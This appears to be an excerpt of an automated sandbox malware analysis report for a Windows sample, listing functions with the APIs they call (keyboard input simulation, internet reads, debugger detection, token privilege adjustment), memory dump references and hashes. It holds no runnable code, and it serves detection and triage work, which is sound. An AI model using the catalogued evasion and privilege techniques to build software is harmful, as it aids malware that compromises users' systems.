                                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0063AB36
                                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0063AB88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: f2c9d336b03205eee80c990fbfff03f7ee9930bafd57aa9a80233c3bbda2663b
                                                                                • Instruction ID: 6a88208de72fa8cf99593a60e0bfbae3fbe77cd3b97fb5c4e64eee4b62037a7b
                                                                                • Opcode Fuzzy Hash: f2c9d336b03205eee80c990fbfff03f7ee9930bafd57aa9a80233c3bbda2663b
                                                                                • Instruction Fuzzy Hash: BB31FA31A40648AFFB35CBA5CC05BFAB7A7AB44320F04421AF5C2962D1D3758981E7E6
                                                                                Function 0064CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0064CE89
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0064CEEA
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 0064CEFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                • String ID:
                                                                                • API String ID: 234945975-0
                                                                                • Opcode ID: 4ecacd9f43b9267a1afe253917a6f64d98d40c8a1f2cbf5543d51daa0c01b1db
                                                                                • Instruction ID: cc50354eb3f34d0db98edb15956a35b4b52ad4b951387d12fe3c4c8ebace0e45
                                                                                • Opcode Fuzzy Hash: 4ecacd9f43b9267a1afe253917a6f64d98d40c8a1f2cbf5543d51daa0c01b1db
                                                                                • Instruction Fuzzy Hash: BE21BDB15017059BDB60DFA5C948BA67BFEEF40324F10442EE646E2351E774EE099B60
                                                                                Function 00602622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0060271A
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00602724
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00602731
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: b2ef9f1306a3456d01160740bcdf5795580cef949363bffe58dbba6342937c69
                                                                                • Instruction ID: 9e5238334b0a16dbe3597e1698b8dd563a2980394f6a5dc24e94043c5d8aa574
                                                                                • Opcode Fuzzy Hash: b2ef9f1306a3456d01160740bcdf5795580cef949363bffe58dbba6342937c69
                                                                                • Instruction Fuzzy Hash: 1531C27495121DABCB21DF68DC887DDBBB8BF08310F5051EAE90CA62A1E7749F818F44
                                                                                Function 006451CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 006451DA
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00645238
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 006452A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1682464887-0
                                                                                • Opcode ID: 6d775be69e06ed781dfdcf92faa94e5d844293df8083700a12a47bcbdd17dc99
                                                                                • Instruction ID: d40e685cc594e1f2f442e1212d840758fcbccd88e674258a9debc3abf8d0eff7
                                                                                • Opcode Fuzzy Hash: 6d775be69e06ed781dfdcf92faa94e5d844293df8083700a12a47bcbdd17dc99
                                                                                • Instruction Fuzzy Hash: 58318E35A00509DFDB00DF94D888EEEBBB5FF49314F04809AE805AB362DB71E946CB90
                                                                                Function 006316C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005F0668
                                                                                  • Part of subcall function 005EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005F0685
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063170D
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063173A
                                                                                • GetLastError.KERNEL32 ref: 0063174A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 577356006-0
                                                                                • Opcode ID: 81cb7acdb95b1a8341ff4f375beb9332f3b9d245dc27c8dd9bc71171585c5648
                                                                                • Instruction ID: e8813f01b020372cc7269d62edc1fb9b1b25b71b0f9ec4ad409da34c8ec9a288
                                                                                • Opcode Fuzzy Hash: 81cb7acdb95b1a8341ff4f375beb9332f3b9d245dc27c8dd9bc71171585c5648
                                                                                • Instruction Fuzzy Hash: 401101B2400305AFD718AF54DC86D6ABBBEFB44724B20852EE09657241EB71BC428B60
                                                                                Function 0063D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0063D608
                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0063D645
                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0063D650
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 33631002-0
                                                                                • Opcode ID: ec594526c1ebd9c2cd55cff72b22cba9afb376c3494828a6ede60a64e923e118
                                                                                • Instruction ID: bfb1058dfbcc41cf67b33e3dc45aef709c82aca9984a76b4cb178ffef800f105
                                                                                • Opcode Fuzzy Hash: ec594526c1ebd9c2cd55cff72b22cba9afb376c3494828a6ede60a64e923e118
                                                                                • Instruction Fuzzy Hash: F9118E71E01228BFDB108F95EC45FAFBBBDEB45B60F108111F914E7290C2B04A058BE1
                                                                                Function 00631663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0063168C
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006316A1
                                                                                • FreeSid.ADVAPI32(?), ref: 006316B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: 775d9fee2cba085700ca3170a6ae20b78c9fe8a7ec6893055ee83948f864496c
                                                                                • Instruction ID: f78794315706a720195d8221aa50a546c4eb8552dc1969ea664b4f75e8e55ae7
                                                                                • Opcode Fuzzy Hash: 775d9fee2cba085700ca3170a6ae20b78c9fe8a7ec6893055ee83948f864496c
                                                                                • Instruction Fuzzy Hash: 9EF04471950308FBDB00DFE08D89AAEBBBDEB08210F404461E500E2180E371AA448A50
                                                                                Function 005F4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(006028E9,?,005F4CBE,006028E9,006988B8,0000000C,005F4E15,006028E9,00000002,00000000,?,006028E9), ref: 005F4D09
                                                                                • TerminateProcess.KERNEL32(00000000,?,005F4CBE,006028E9,006988B8,0000000C,005F4E15,006028E9,00000002,00000000,?,006028E9), ref: 005F4D10
                                                                                • ExitProcess.KERNEL32 ref: 005F4D22
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 363d56d5da46dc876e6b7ab678932a5099975d2efc052091b0e51823ba5ddeea
                                                                                • Instruction ID: 37626a4e1ff3dffb2df72a662841e7a4adbbcb23f4e4c6cee9216540a1ea3689
                                                                                • Opcode Fuzzy Hash: 363d56d5da46dc876e6b7ab678932a5099975d2efc052091b0e51823ba5ddeea
                                                                                • Instruction Fuzzy Hash: 60E0B631000948ABDF11AF55DD09A6A3F6AFB85791B104018FD55DA222DB79DD42CE80
                                                                                Function 0060C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: /
                                                                                • API String ID: 0-2043925204
                                                                                • Opcode ID: 7a6fe53b73dc4c998cb735b1f10068260746f040ac6401afc988a4395e2d77b8
                                                                                • Instruction ID: 562609c18b3c9f334ce064558e8c399ff5ce641c84620fbb8f6cbeddc286d5f6
                                                                                • Opcode Fuzzy Hash: 7a6fe53b73dc4c998cb735b1f10068260746f040ac6401afc988a4395e2d77b8
                                                                                • Instruction Fuzzy Hash: 02414972540219AFCB289FB9CC49EFB77BAEB84324F10426DF905D72C0E6709E418B50
                                                                                Function 0062D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 0062D28C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID: X64
                                                                                • API String ID: 2645101109-893830106
                                                                                • Opcode ID: 2511d5900937850c63cdeafb1195f71bb790dde58d1fde1483e8f6685ab8bcb3
                                                                                • Instruction ID: 31980044207c3fe015b4d41216db1af7986c6df3fb8431253b0685f4b33daa0a
                                                                                • Opcode Fuzzy Hash: 2511d5900937850c63cdeafb1195f71bb790dde58d1fde1483e8f6685ab8bcb3
                                                                                • Instruction Fuzzy Hash: F1D0C9B480112DEACB94CB90EC88DD9B77CBB04305F100551F546A2000D77096499F20
                                                                                Function 005FCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                • Instruction ID: c780b381e4f31203c5ebb0e0dc1bb99ec0f4d83a9c73f71577bbc796b9a212e4
                                                                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                • Instruction Fuzzy Hash: E3021B71E0021D9BDF14CFA9C9806ADFFB5FF88314F258169DA19EB280D735AE418B94
                                                                                Function 005DCAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Variable is not of type 'Object'.$p#j
                                                                                • API String ID: 0-4239671147
                                                                                • Opcode ID: cd1d83388b199a871525c524b7c902b7876949a260cbb9630b521d1844c8b80c
                                                                                • Instruction ID: 8564d49e6ce35bef352b969c54ba14f26b972aae543ea12bb40dce182962e192
                                                                                • Opcode Fuzzy Hash: cd1d83388b199a871525c524b7c902b7876949a260cbb9630b521d1844c8b80c
                                                                                • Instruction Fuzzy Hash: B932797090021ADBDF24DF98D885AEDBFBABF45304F20445BE806AB392D771AE45CB50
                                                                                Function 006468EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00646918
                                                                                • FindClose.KERNEL32(00000000), ref: 00646961
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 962ef87779eb21485bb727c5b02218adc2e2facf0059de73386044f4fc3ff197
                                                                                • Instruction ID: 61dac7ddda4e1b999abf05914a0262b58cd8a9d077de0551fa500947fd4706a4
                                                                                • Opcode Fuzzy Hash: 962ef87779eb21485bb727c5b02218adc2e2facf0059de73386044f4fc3ff197
                                                                                • Instruction Fuzzy Hash: D11181316046029FC710DF29D488A16BBE5FF85328F14C69AF8698F3A2C770EC05CB91
                                                                                Function 006437B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00654891,?,?,00000035,?), ref: 006437E4
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00654891,?,?,00000035,?), ref: 006437F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: 4362b6721db69c32c746b2bfb07d2af289ba5d096d968c371565a3b8def3d886
                                                                                • Instruction ID: d60953d4577c22f9c23ac8190291c393fcf23648551086621f99351f8795615a
                                                                                • Opcode Fuzzy Hash: 4362b6721db69c32c746b2bfb07d2af289ba5d096d968c371565a3b8def3d886
                                                                                • Instruction Fuzzy Hash: 79F0E5B06053292AE76017668C4DFEB3BAFEFC5771F000176F509E2391D9A09D44C6B0
                                                                                Function 0063B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0063B25D
                                                                                • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 0063B270
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: InputSendkeybd_event
                                                                                • String ID:
                                                                                • API String ID: 3536248340-0
                                                                                • Opcode ID: 39af49eae1e40752fb47a75840a69db69b776a6776822b989091de32038b9f8c
                                                                                • Instruction ID: c282564cb5c41baf159757b129a7e2d5d717636d1442ac5b192574ace8a5074d
                                                                                • Opcode Fuzzy Hash: 39af49eae1e40752fb47a75840a69db69b776a6776822b989091de32038b9f8c
                                                                                • Instruction Fuzzy Hash: 3FF01D7180428DAFDB059FA1C806BFE7FB5FF04319F00900AF965A5192C7B986119F94
                                                                                Function 006310BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006311FC), ref: 006310D4
                                                                                • CloseHandle.KERNEL32(?,?,006311FC), ref: 006310E9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: 9f2f2a6b94242ae3594ad4dcdd0ff0452f56aabd31a6c6c1fa4962b1530a72db
                                                                                • Instruction ID: 571ba2900bff373453afb540ff48bd0447739c9b1543fccaad606cd75cc46cd0
                                                                                • Opcode Fuzzy Hash: 9f2f2a6b94242ae3594ad4dcdd0ff0452f56aabd31a6c6c1fa4962b1530a72db
                                                                                • Instruction Fuzzy Hash: 84E0BF72018B51AEE7292B52FC09E777BAAFB04320F14882DF5E5945B1DFA26C90DB50
                                                                                Function 0060676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00606766,?,?,00000008,?,?,0060FEFE,00000000), ref: 00606998
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
